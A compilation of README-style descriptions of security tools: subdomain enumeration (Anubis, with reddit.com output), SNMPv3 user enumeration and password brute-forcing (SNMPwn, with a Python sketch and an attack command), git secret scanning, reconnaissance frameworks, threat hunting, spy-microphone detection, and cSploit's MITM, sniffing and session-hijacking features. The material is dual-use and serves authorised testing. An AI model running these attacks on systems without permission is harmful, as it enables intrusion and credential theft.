Anubis is a subdomain enumeration and information gathering tool. Anubis collates data from a variety of sources, including HackerTarget, DNSDumpster, x509 certs, VirusTotal, Google, Pkey, and NetCraft. Anubis also has a sister project, AnubisDB, which serves as a centralized repository of subdomains. Subdomains are automatically sent to AnubisDB; to disable this functionality, pass the -d flag when running Anubis.
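
One of those sources, x509 certificate transparency logs, is easy to illustrate; the sketch below queries crt.sh's JSON endpoint directly (a standalone example, not Anubis's implementation):

import requests

def crtsh_subdomains(domain):
    # crt.sh returns one JSON row per certificate; name_value holds the SAN entries
    r = requests.get("https://crt.sh/",
                     params={"q": f"%.{domain}", "output": "json"}, timeout=30)
    names = set()
    for row in r.json():
        for name in row["name_value"].splitlines():
            if name.endswith(domain):
                names.add(name.lstrip("*."))  # drop wildcard prefixes
    return sorted(names)

print(crtsh_subdomains("example.com"))  # placeholder domain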

Getting Started

Prerequisites
  • Nmap
If you are running Linux, the following are also required:
sudo apt-get install python3-pip python-dev libssl-dev libffi-dev

Installing
Note: Python 3.6 is required
pip3 install anubis-netsec

Install From Source
Please note Anubis is still in beta.
git clone git@github.com:jonluca/Anubis.git
cd Anubis
pip3 install -r requirements.txt
pip3 install .

Other Notes
If you have both python3 and python2 installed on your system, you might have to replace all instances of pip with pip3 in the commands below.
If running on a Linux distro, openssl and the python dev headers will be required as well, which can be installed with:
sudo apt-get install python3-pip python-dev libssl-dev libffi-dev


Usage
Usage:
anubis -t TARGET [-o FILENAME] [-noispbdrv] [-w SCAN] [-q NUM]
anubis -h
anubis --version

Options:
-h --help show this help message and exit
-t --target set target (comma separated, no spaces, if multiple)
-n --with-nmap perform an nmap service/script scan
-o --output save to filename
-i --additional-info show additional information about the host from Shodan (requires API key)
-s --ssl run an ssl scan and output cipher + chain info
-p --ip outputs the resolved IPs for each subdomain, and a full list of unique ips
-b --brute-force attempts to use a common word list to find subdomains (usually not very successful)
-d --no-anubis-db don't send to or receive from anubisdb
-r --recursive recursively search over all subdomains
-w --overwrite-nmap-scan SCAN overwrite default nmap scan (default -nPn -sV -sC)
-v --verbose print debug info and full request output
-q --queue-workers NUM override number of queue workers (default: 10, max: 100)
--version show version and exit

Help:
For help using this tool, please open an issue on the Github repository:
https://github.com/jonluca/anubis

Basic

Common Use Case
anubis -tip domain.com -o out.txt

Sets the target to domain.com, outputs additional information like the server or ISP/hosting provider, then attempts to resolve all URLs and outputs a list of unique IPs. Finally, writes all results to out.txt.

Other
anubis -t reddit.com
The simplest use of Anubis; it just runs subdomain enumeration
Searching for subdomains for 151.101.65.140 (reddit.com)

Testing for zone transfers
Searching for Subject Alt Names
Searching HackerTarget
Searching VirusTotal
Searching Pkey.in
Searching NetCraft.com
Searching crt.sh
Searching DNSDumpster
Searching Anubis-DB
Found 193 subdomains
----------------
fj.reddit.com
se.reddit.com
gateway.reddit.com
beta.reddit.com
ww.reddit.com
... (truncated for readability)
Sending to AnubisDB
Subdomain search took 0:00:20.390
anubis -t reddit.com -ip
(equivalent to anubis -t reddit.com --additional-info --ip) - resolves IPs and outputs list of uniques, and provides additional information through https://shodan.io
Searching for subdomains for 151.101.65.140
Server Location: San Francisco US - 94107
ISP: Fastly
Found 27 domains
----------------
http://www.np.reddit.com: 151.101.193.140
http://nm.reddit.com: 151.101.193.140
http://ww.reddit.com: 151.101.193.140
http://dg.reddit.com: 151.101.193.140
http://en.reddit.com: 151.101.193.140
http://ads.reddit.com: 151.101.193.140
http://zz.reddit.com: 151.101.193.140
out.reddit.com: 107.23.11.190
origin.reddit.com: 54.172.97.226
http://blog.reddit.com: 151.101.193.140
alb.reddit.com: 52.201.172.48
http://m.reddit.com: 151.101.193.140
http://rr.reddit.com: 151.101.193.140
reddit.com: 151.101.65.140
http://www.reddit.com: 151.101.193.140
mx03.reddit.com: 151.101.193.140
http://fr.reddit.com: 151.101.193.140
rhs.reddit.com: 54.172.97.229
http://np.reddit.com: 151.101.193.140
http://nj.reddit.com: 151.101.193.140
http://re.reddit.com: 151.101.193.140
http://iy.reddit.com: 151.101.193.140
mx02.reddit.com: 151.101.193.140
mailp236.reddit.com: 151.101.193.140
Found 6 unique IPs
52.201.172.48
151.101.193.140
107.23.11.190
151.101.65.140
54.172.97.226
54.172.97.229
Execution took 0:00:04.604

Advanced
anubis -t reddit.com --with-nmap -o temp.txt -is --overwrite-nmap-scan "-F -T5"

Searching for subdomains for 151.101.65.140 (reddit.com)

Testing for zone transfers
Searching for Subject Alt Names
Searching HackerTarget
Searching VirusTotal
Searching Pkey.in
Searching NetCraft.com
Searching crt.sh
Searching DNSDumpster
Searching Anubis-DB
Running SSL Scan
Available TLSv1.0 Ciphers:
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
Available TLSv1.2 Ciphers:
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
* Certificate Information:
Content
SHA1 Fingerprint: f8d1965323111e86e6874aa93cc7c52969fb22bf
Common Name: *.reddit.com
Issuer: DigiCert SHA2 Secure Server CA
Serial Number: 11711178161886346105980166697563149367
Not Before: 2015-08-17 00:00:00
Not After: 2018-08-21 12:00:00
Signature Algorithm: sha256
Public Key Algorithm: RSA
Key Size: 2048
Exponent: 65537 (0x10001)
DNS Subject Alternative Names: ['*.reddit.com', 'reddit.com', '*.redditmedia.com', 'engine.a.redditmedia.com', 'redditmedia.com', '*.redd.it', 'redd.it', 'www.redditstatic.com', 'imgless.reddituploads.com', 'i.reddituploads.com', '*.thumbs.redditmedia.com']

Trust
Hostname Validation: OK - Certificate matches reddit.com
AOSP CA Store (7.0.0 r1): OK - Certificate is trusted
Apple CA Store (OS X 10.11.6): OK - Certificate is trusted
Java 7 CA Store (Update 79): OK - Certificate is trusted
Microsoft CA Store (09/2016): OK - Certificate is trusted
Mozilla CA Store (09/2016): OK - Certificate is trusted
Received Chain: *.reddit.com --> DigiCert SHA2 Secure Server CA
Verified Chain: *.reddit.com --> DigiCert SHA2 Secure Server CA --> DigiCert Global Root CA
Received Chain Contains Anchor: OK - Anchor certificate not sent
Received Chain Order: OK - Order is valid
Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain

OCSP Stapling
OCSP Response Status: successful
Validation w/ Mozilla Store: OK - Response is trusted
Responder Id: 0F80611C823161D52F28E78D4638B42CE1C6D9E2
Cert Status: good
Cert Serial Number: 08CF7DA9B222C9D983C50D993F2F5437
This Update: Dec 16 16:20:41 2017 GMT
Next Update: Dec 23 15:35:41 2017 GMT
* OpenSSL Heartbleed:
OK - Not vulnerable to Heartbleed
* HTTP Security Headers:
NOT SUPPORTED - Server did not send an HSTS header

HTTP Public Key Pinning (HPKP)
NOT SUPPORTED - Server did not send an HPKP header

Computed HPKP Pins for Current Chain
0 - *.reddit.com 3FUu+FYb3IyHxicQEMs5sSzs207fuv25p7NGRIPDaAw=
1 - DigiCert SHA2 Secure Server CA 5kJvNEMw0KjrCAu7eXY5HZdvyCS13BbA0VJG1RSP91w=
2 - DigiCert Global Root CA r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E=
Searching Shodan.io for additional information
Server Location: San Francisco, US - 94107
ISP or Hosting Company: Fastly
To run a DNSSEC subdomain enumeration, Anubis must be run as root
Starting Nmap Scan
Host : 151.101.65.140 ()
----------
Protocol: tcp
port: 80 state: open
port: 443 state: open
Found 195 subdomains
----------------
nm.reddit.com
ne.reddit.com
sonics.reddit.com
aj.reddit.com
fo.reddit.com
f5.reddit.com
... (truncated for readability)
Sending to AnubisDB
Subdomain search took 0:00:26.579

Running the tests
Run all tests with coverage
 python3 setup.py test
Run tests on their own, in the native pytest environment
pytest





SNMPwn - An SNMPv3 User Enumerator and Attack tool

SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with "Unknown user name" when an SNMP user does not exist, allowing us to cycle through large lists of users to find the ones that do.

What does it do?
  • Checks that the hosts you provide are responding to SNMP requests.
  • Enumerates SNMP users by testing each in the list you provide. Think user brute forcing.
  • Attacks the server with the enumerated accounts and your list of passwords and encryption passwords. No need to attack the entire list of users, only live accounts.
  • Attacks all the different protocol types:
    • No auth no encryption (noauth)
    • Authentication, no encryption (authnopriv)
    • Authentication and encryption (All types supported, MD5, SHA, DES, AES) - (authpriv)

Notes for usage
Built for and tested on Kali Linux 2.x rolling. It should work on any Linux platform, but it does not currently work on Mac OSX (it will when I get around to it); this is due to the stdout messages for snmpwalk on OSX being different. This script basically wraps snmpwalk. The version of snmpwalk used was 5.7.3.
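
The enumeration trick is simple enough to sketch in a few lines of Python around snmpwalk (SNMPwn itself is Ruby; the host here is a placeholder and users.txt is the wordlist mentioned below):

import subprocess

def snmpv3_user_exists(host, user):
    # snmpwalk against a non-existent SNMPv3 user reports "Unknown user name"
    proc = subprocess.run(
        ["snmpwalk", "-v3", "-u", user, "-t", "1", host],
        capture_output=True, text=True,
    )
    return "Unknown user name" not in (proc.stdout + proc.stderr)

for line in open("users.txt"):
    user = line.strip()
    if user and snmpv3_user_exists("192.168.1.1", user):  # placeholder host
        print(f"valid SNMPv3 user: {user}")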

Install
Clone the repo, then:
gem install bundler
bundle install (from inside the snmpwn directory)
Built for Ruby 2.3.x. Older versions of Ruby may work, but anything older than 1.9 may not. You may need to chmod u+x snmpwn.rb before running.

Run
You need to provide the script with a list of users, a hosts list, a password list and an encryption password list. Basic users.txt and passwords.txt files are included. You could use passwords.txt for your encryption list as well, though I would recommend generating one specific to the organisation you are pen testing. The command line options are available via --help as always and should be clear enough. The only ones I would comment on specifically are:
  • --showfail: shows all password attack attempts, both successful and failed. It clutters the console output, so if you do not choose this option you will get a spinning progress indicator instead.
  • --timeout: the timeout in seconds for the command response, which in this case is snmpwalk. It is set to 0.3 by default, which is 300 milliseconds. If you are testing hosts across a slow link you will want to extend this. I wouldn't personally go lower than 300 milliseconds or results may become unreliable.
./snmpwn.rb --hosts hosts.txt --users users.txt --passlist passwords.txt --enclist passwords.txt

Screengrabs

User Enumeration:

Password Attacks:

Summary of results:



truffleHog - Searches Through Git Repositories For High Entropy Strings And Secrets, Digging Deep Into Commit History


Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accidentally committed.

NEW
truffleHog previously functioned by running entropy checks on git diffs. This functionality still exists, but high signal regex checks have been added, and the ability to suppress entropy checking has also been added.
These features help cut down on noise, and make the tool easier to shove into a devops pipeline.
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
or
truffleHog file:///user/dxa4481/codeprojects/truffleHog/



Install
pip install truffleHog

Customizing
Custom regexes can be added to the following file:
truffleHog/truffleHog/regexChecks.py
Things like subdomain enumeration, s3 bucket detection, and other useful regexes highly custom to the situation can be added.
Feel free to also contribute high signal regexes upstream that you think will benefit the community. Things like Azure keys, Twilio keys, and Google Compute keys are welcome, provided a high signal regex can be constructed.

How it works
This module will go through the entire commit history of each branch, check each diff from each commit, and look for secrets, both by regex and by entropy. For entropy checks, truffleHog evaluates the Shannon entropy for both the base64 character set and the hexadecimal character set, for every blob of text longer than 20 characters composed of those characters in each diff. If at any point a high-entropy string longer than 20 characters is detected, it is printed to the screen.
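
The entropy check described above boils down to Shannon entropy over a fixed character set; a short sketch of the idea (mirroring, not copying, truffleHog's code):

import math

BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "1234567890abcdefABCDEF"

def shannon_entropy(data, charset):
    # H = -sum(p * log2(p)) over the characters of the given charset
    if not data:
        return 0.0
    entropy = 0.0
    for ch in charset:
        p = data.count(ch) / len(data)
        if p > 0:
            entropy -= p * math.log2(p)
    return entropy

print(shannon_entropy("569a59844c7b3c2d403b7bc7355e3053", HEX_CHARS))    # high: random hex
print(shannon_entropy("hello world this is low entropy", BASE64_CHARS))  # low: natural language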

Help
Find secrets hidden in the depths of git.

positional arguments:
git_url URL for secret searching

optional arguments:
-h, --help show this help message and exit
--json Output in JSON
--regex Enable high signal regex checks
--entropy DO_ENTROPY Enable entropy checks
--since_commit SINCE_COMMIT
Only scan from a given commit hash
--max_depth MAX_DEPTH
The max commit depth to go back when searching for
secrets



Recon-ng - Full-Featured Web Reconnaissance Framework


Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.
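
For a sense of what that looks like, here is a hedged skeleton of a custom module (field names follow recon-ng v4 conventions and may differ between versions; the module name, query, and output are placeholders):

from recon.core.module import BaseModule

class Module(BaseModule):
    meta = {
        'name': 'Example Module',
        'author': 'you',
        'description': 'Demonstrates the BaseModule interface.',
        'query': 'SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL',
    }

    def module_run(self, domains):
        # 'domains' is the seed data selected by the module's SOURCE option
        for domain in domains:
            self.output('Processing %s' % domain)
            # e.g. self.add_hosts(host='www.' + domain) would store a new host row

Dropped under ~/.recon-ng/modules/ (see the Usage Notes below), a module like this is loaded into the framework at runtime.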

Getting Started


Installation - Kali Linux
  • Install Recon-ng
    apt-get update && apt-get install recon-ng

Installation - Source
  • Clone the Recon-ng repository.
    git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
  • Change into the Recon-ng directory.
    cd recon-ng
  • Install dependencies.
    pip install -r REQUIREMENTS
  • Launch Recon-ng.
    ./recon-ng
  • Use the "-h" switch for information on runtime options.
    ./recon-ng -h

Helpful Resources

Dependencies
  • All 3rd party libraries/packages should be installed prior to use. The framework checks for the presence of dependencies at runtime and disables the modules affected by missing dependencies.

Usage Notes
Below are a few helpful nuggets for getting started with the Recon-ng framework. While not all features are covered, the following notes will help make sense of a few of the framework's more helpful and complex features.
  • Users will likely create and share custom modules that are not merged into the master branch of the framework. In order to allow for the use of these modules without interfering with the installed package, the framework allows for the use of a custom module tree placed in the user's "home" directory. In order to leverage this feature, a directory named "modules" must be created underneath the ".recon-ng" directory, i.e. "~/.recon-ng/modules/". Custom modules that are added to the "~/.recon-ng/modules/" directory are loaded into the framework at runtime. Where the modules are placed underneath the "~/.recon-ng/modules/" directory doesn't affect functionality, but things will look much nicer in the framework if the proper module directory tree is replicated and the modules are placed in the proper category.
  • Modules are organized to facilitate the flow of a penetration test, and there are separate module branches within the module tree for each methodology step. Reconnaissance, Discovery, Exploitation and Reporting are steps 1, 3, 4 and 5 of the Web Application Penetration Testing Methodology. Therefore, each of these steps has its own branch in the module tree. It is important to understand the difference between Reconnaissance and Discovery. Reconnaissance is the use of open sources to gain information about a target, commonly referred to as "passive reconnaissance". Discovery, commonly referred to as "active reconnaissance", occurs when packets are explicitly sent to the target network in an attempt to "discover" vulnerabilities. While Recon-ng is a reconnaissance framework, elements from the other steps of the methodology will be included as a convenient place to leverage the power of Python.
  • After loading a module, the context of the framework changes, and a new set of commands and options are available. These commands and options are unique to the module. Use the "help" and "show" commands to gain familiarity with the framework and available commands and options at the root (global) and module contexts.
  • The "info" and "source" subcommands of "show" (available only in the module context) are particularly helpful ways to discover the capabilities of the framework. The "show info" command will return detailed information about the loaded module, and the "show source" command will display its source code. Spend some time exploring modules with the "show info" and "show source" commands to get a sense for how information flows through the framework.
  • The "query" command assists in managing and understanding the data stored in the database. Users are expected to know and understand Structured Query Language (SQL) in order to interact with the database via the "query" command. The "show schema" command provides a graphical representation of the database schema to assist in building SQL queries. The "show schema" command creates the graphical representation dynamically, so as the schema of the database changes, so will the result of the command.
  • Pay attention to the global options, as they have changed over time and have a large impact on the performance of the framework. Many of the online tutorials regarding Recon-ng are outdated and misrepresent the purpose of Global options as they stand now. Global options are the options that are available at the root (global) context of the framework and have a global effect on how the framework operates. Global options such as "VERBOSITY" and "PROXY" drastically change how the modules present feedback and make web requests. Explore and understand the global options before diving into the modules.
  • The modular nature of the framework requires frequently switching between modules and setting options unique to each one. It can become taxing having to repeatedly set module options as information flows through the framework. Therefore, option values for all contexts within the framework are stored locally and loaded dynamically each time the context is loaded. This provides persistence to the configuration of the framework between sessions.
  • Workspaces help users to conduct multiple simultaneous engagements without having to repeatedly configure global options or databases. All of the information for each workspace is stored in its own directory underneath the "~/.recon-ng/workspaces/" folder. Each workspace consists of its own instance of the Recon-ng database, a configuration file for the storage of configuration options, reports from reporting modules, and any loot that is gathered from other modules. To create a new workspace, use the "workspaces" command, workspaces add <name>. Loading an existing workspace is just as easy, workspaces select <name>. To view a list of available workspaces, see the "workspaces list" command or the "show workspaces" alias. To delete a workspace, use the "workspaces delete" command, workspaces delete <name>. Workspaces can also be created or loaded at runtime by invoking the "-w <workspace>" argument when executing Recon-ng, ./recon-ng -w bhis.
  • The "search" command provides the capability to search the names of all loaded modules and present the matches to the user. The "search" command can be very helpful in determining what to do next with the information that has been harvested, or identifying what is required to get the desired information. The "recon" branch of the module tree follows the following path structure: recon/<input table>-<output table>/<module>. This provides simplicity in determining what module is available for the action the user wants to take next. To see all of the modules which accept a domain as input, search for the input table name "domains" followed by a dash: search domains-. To see all of the modules which result in harvested hosts, search for the output table name "hosts" with a preceding dash: search -hosts.
  • The entire framework is equipped with command completion. Whether exploring standard commands, or passing parameters to commands, tap the "tab" key several times to be presented with all of the available options for that command or parameter.
  • Even with command completion, module loading can be cumbersome because of the directory structure of the module tree. To make module loading easier, the framework is equipped with a smart loading feature. This feature allows modules to be loaded by referring to a keyword unique to the desired module's name. For instance, use namechk will load the "recon/contacts-contacts/namechk" module without requiring the full path since it is the only module containing the string "namechk". Attempting to smart load with a string that exists in more than one module name will result in a list of all possible modules for the given keyword. For example, there are many modules whose names contain the string "pwned". Therefore, the command use pwned would not load a module, but return a list of possible modules for the user to reference by full module name.
  • Every piece of information stored in the Recon-ng database is a potential input "seed" from which new information can be harvested. The "add" command allows users to add initial records to the database which will become input for modules. Modules take the seed data, transform it into other data types, and store the data in the database as potential input for other modules. Each module has a "SOURCE" option which determines the seed data. The "SOURCE" option provides flexibility in what the user can provide to modules as input. The "SOURCE" option allows users to select "default", which is seed data from the database as determined by the module developer, a single entry as a string, the path to a file, or a custom SQL query. The framework will detect the source and provide it as input to the module. Changing the "SOURCE" option of a module does not affect how the module handles the resulting information.
  • While the "shell" command and "!" alias give users the ability to run system commands on the local machine from within the framework, neither of these commands is necessary to achieve this functionality. Any input that the framework does not understand as a framework command is executed as a system command. Therefore, the only time that "shell" or "!" is necessary is when the desired command shares the same name as a framework command.
  • A recorded session of all activity is essential for many penetration testers, but built-in OS tools like "tee" and "script" break needed functionality, like tab completion, and muck with output formatting. To solve this dilemma, the framework is equipped with the ability to spool all activity to a file for safe keeping. The "spool" command gives users the ability to start and stop spooling, or check the current spooling status. The destination file for the spooled data is set as a parameter of the "spool start" command, spool start <filename>. Use help spool for more information on the "spool" command.
  • Backing up data at important points during the reconnaissance process helps to prevent the loss or corruption of data due to unexpected resource behavior. The "snapshots" command gives users the ability to backup and restore snapshots of the database. Use help snapshots for more information on the "snapshots" command.


              Archery - Open Source Vulnerability Assessment And Management Helps Developers And Pentesters To Perform Scans And Manage Vulnerabilities

              $
              0
              0

              Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scaning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.

              Demo


              Overview of the tool:
              • Perform Web and Network vulnerability Scanning using opensource tools.
              • Correlates and Collaborate all raw scans data, show them in a consolidated manner.
              • Perform authenticated web scanning.
              • Perform web application scanning using selenium.
              • Vulnerability Managment.
              • Enable REST API's for developers to perform scaning and Vulnerability Managment.
              • Useful for DevOps teams for Vulnerability Managment.

              Note
              Currently project is in developement phase and still lot of work going on.

              Requirement

              Installation
              $ git clone https://github.com/anandtiwarics/archerysec.git
              $ cd /archerysecurity
              $ pip install -r requirements.txt
              $ python manage.py collectstatic
              $ python manage.py makemigrations networkscanners
              $ python manage.py makemigrations webscanners
              $ python manage.py makemigrations projects
              $ python manage.py migrate
              $ python manage.py createsuperuser
              $ python manage.py runserver
              Note: these steps (except createsuperuser) should be performed after every git pull.
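
              For example, a routine update then looks like the following (assuming the default clone directory; Django's makemigrations accepts several app labels at once):
              $ cd archerysec
              $ git pull
              $ pip install -r requirements.txt
              $ python manage.py collectstatic
              $ python manage.py makemigrations networkscanners webscanners projects
              $ python manage.py migrate
              $ python manage.py runserver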

              Setup Setting
              ZAP Setting
              1. Go to the Settings page
              2. Edit the ZAP setting or navigate to http://host:port/setting_edit/
              3. Fill in the required information and click Save.
              OpenVAS Setting
              1. Go to the Settings page
              2. Edit the OpenVAS setting or navigate to http://host:port/networkscanners/openvas_setting
              3. Fill in the required information and click Save.

              Road Map
              • API automated vulnerability scanning.
              • Perform reconnaissance before scanning.
              • Concurrent scans.
              • Vulnerability PoC pictures.
              • Cloud security scanning.
              • Dashboards.
              • Easier installation.


              Salamandra - Spy Microphone Detection Tool


              Salamandra is a tool to detect and locate spy microphones in closed environments. It finds microphones based on the strength of the signal sent by the microphone and the amount of noise and overlapping frequencies. Based on the generated noise, it can estimate how close or far away you are from the microphone.

              Installation

              USB SDR Device
              To use Salamandra you need an SDR (Software Defined Radio) device. It can be any of the cheap USB devices, such as this.

              rtl_power software
              Salamandra needs the rtl_power software installed on your computer. To install it:
              • On MacOS:
                sudo port install rtl-sdr
              If you don't have MacPorts on your Mac, see the MacPorts installation instructions
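              • On Debian/Ubuntu (an assumption on our part; the project only documents MacPorts), the tools ship in the rtl-sdr package:
                sudo apt-get install rtl-sdr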
              If rtl_power was installed correctly, you should be able to run this command in any console:
              rtl_test
              And you should see one device detected.

              Usage

              Basic usage for detecting microphones
              ./salamandra.py 
              This command uses a default threshold of 10.8, a minimum frequency of 100 MHz, a maximum frequency of 400 MHz, and sound enabled. You can change the default values with parameters, as in the example below.
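              For example, to keep the default threshold but scan only 100-200 MHz with sound enabled (the flags are the same ones used in the modes below; the values here are just an illustration):
                ./salamandra.py -t 10.8 -a 100 -b 200 -S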

              Location Mode to find Hidden Microphones
              • Run Salamandra with a threshold of 0, starting at 100 MHz and ending at 200 MHz. Search is activated with -s, and sounds with -S:
                ./salamandra.py -t 0 -a 100 -b 200 -s -S

              Location Mode from a stored rtl_power file
              ./salamandra.py -t 0 -a 111 -b 113 -s -f stored.csv
              To actually create the file with rtl_power, from 111 MHz to 114 MHz, with a 4000 kHz step, a gain of 25, an integration interval of 1 s, and a capture time of 5 min (300 s), you can run:
              rtl_power -f 111M:114M:4000Khz -g 25 -i 1 -e 300 stored.csv

              Detection Mode (now deprecated): detect microphones in one pass.
              • Run Salamandra with a threshold of 10.3, starting at 100 MHz and ending at 200 MHz, with the -F option set to 2:
                ./salamandra.py -t 10.3 -a 100 -b 200 -F 2

              Tips
              • The wider the selected frequency range, the longer the analysis takes.
              • The wider the range, the higher the probability of finding microphones.
              • Once you know the probable frequency, you can narrow the range down with the parameters, as shown below.
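
              For example, if the scan shows a probable microphone around 112 MHz (a hypothetical value), re-run the location mode over just that band:
                ./salamandra.py -t 0 -a 111 -b 113 -s -S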

              TODO
              1. Make it clearer whether or not there is a detection
              2. Reduce false positives by:
                • Generating sound based on the length of the histogram
                • Discarding frequencies that do not look like analog audio (equidistant frequencies)
              3. Log to a file
              4. Run rtl_power in a separate background process


              ACE - Automated, Collection, and Enrichment Platform


              The Automated Collection and Enrichment (ACE) platform is a suite of tools for threat hunters to collect data from many endpoints in a network and automatically enrich the data. The data is collected by running scripts on each computer without installing any software on the target. ACE supports collecting from Windows, macOS, and Linux hosts.
              ACE is meant to simplify the process of remotely collecting data across an environment by offering credential management, scheduling, centralized script management, and remote file downloading. ACE is designed to complement a SIEM by collecting and enriching data; final analysis is best suited to SIEM tools such as Splunk, ELK, or whatever the analyst prefers.

              Why use ACE?
              ACE grew out of the need to perform Compromise Assessments in places with common restrictions:
              • A dedicated software agent can’t be installed on the target hosts.
              • Copying and running executables (such as Sysinternals tools) is not feasible.
              • The customer cannot enable Windows Remoting (WinRM).
              • The customer’s visibility into macOS/Linux hosts is limited or nonexistent.
              • New scripts/tools must be created for customer-specific data.
              • Network segmentation requires multiple credentials to access all machines in the environment.

              Installation/What is the architecture of ACE?
              ACE has three components: the ACE Web Service, the ACE SQL database, and the ACE RabbitMQ message queue. The Web Service is a RESTful API that takes requests from clients to schedule and manage scans. The SQL database stores the configuration and data from scans. The RabbitMQ service handles automated enrichment of data.
              Each of the services can be deployed on separate machines, or all on a single server. You can use the provided Docker images to easily deploy premade ACE services.

              Usage/How do I use ACE?
              The ACE repository includes a collection of PowerShell scripts to interact with the ACE Web Service, including adding users, managing credentials, uploading collection scripts, and scheduling scans.
              After deploying the ACE servers, use New-AceUser to create a new ACE user.
              Remove the default “Admin” user with Remove-AceUser.
              Use New-AceCredential to enter a set of credentials.
              Run Start-AceDiscovery to automatically find computers on the Windows domain.
              Run Start-AceSweep to start a sweep that runs the selected scripts across the discovered endpoints.
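
              Put together, a first session with the ACE PowerShell scripts might look like this sketch (the cmdlet names come from the text above; all parameters are omitted because they are not documented in this article, so check each cmdlet's built-in help):
              PS> New-AceUser          # create your own ACE user
              PS> Remove-AceUser       # remove the default "Admin" user
              PS> New-AceCredential    # store a set of collection credentials
              PS> Start-AceDiscovery   # find computers on the Windows domain
              PS> Start-AceSweep       # run the selected scripts across the discovered endpoints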

              How do I add scripts to ACE?
              ACE scripts should be self-contained scripts that collect data and return a JSON object with the results. You can use the ConvertTo-JsonV2 cmdlet in ACE to convert PSObjects into JSON objects in a PowerShell V2-compatible way.
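
              A minimal sketch of such a collection script (piping into ConvertTo-JsonV2 is an assumption; verify the cmdlet's actual parameters in the ACE repository):
              # Collect a simple process listing and emit it as JSON (PowerShell V2 compatible)
              $data = Get-Process | Select-Object Name, Id, Path
              $data | ConvertTo-JsonV2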
              We recommend PSReflect to access the Native/Win32 API in-memory in a PowerShell V2 compatible way. See Get-InjectedThread for a usage example.
              Use New-ACEScript to upload a new script to ACE. The new script can be added to existing scheduled sweeps or incorporated into new sweeps.

              What targets are supported by ACE?
              The included collection scripts are designed to be PowerShell V2+ and Python 2.7 compatible, and should work on Windows 7/Server 2008 R2 and newer, and most versions of macOS and Linux.

              More Resources

              Contributing
              Contributions to ACE are always welcome.


              cSploit Android - The most complete and advanced IT security professional toolkit on Android


              cSploit is a free/libre and open source (GPLed) Android network analysis and penetration suite which aims to be the most complete and advanced professional toolkit for IT security experts/geeks to perform network security assessments on a mobile device.
              See more at www.cSploit.org.

              Features
              • Map your local network
              • Fingerprint hosts' operating systems and open ports
              • Add your own hosts outside the local network
              • Integrated traceroute
              • Integrated Metasploit framework RPCd
                • Search hosts for known vulnerabilities via integrated Metasploit daemon
                • Adjust exploit settings, launch, and create shell consoles on exploited systems
                • More coming
              • Forge TCP/UDP packets
              • Perform man-in-the-middle (MITM) attacks, including:
                • Image, text, and video replacement: serve your own content on unencrypted web pages
                • JavaScript injection: add your own JavaScript to unencrypted web pages
                • Password sniffing (with dissection of common protocols)
                • Capture of pcap network traffic files
                • Real-time traffic manipulation to replace images/text or inject into web pages
                • DNS spoofing to redirect traffic to a different domain
                • Breaking existing connections
                • Redirecting traffic to another address
                • Session hijacking: listen for unencrypted cookies and clone them to take over a Web session

              Also see the wiki for instructions on building, reporting issues, and more.

              Requirements
              • A ROOTED device running Android 2.3 (Gingerbread) or newer
              • The Android OS must have a full BusyBox installation with every utility installed (not the partial installation). If you do not have BusyBox already, you can get it here or here (note: cSploit does not endorse any BusyBox installer; these are just two we found).
              • You must install SuperSU (cSploit will only work if it is present)

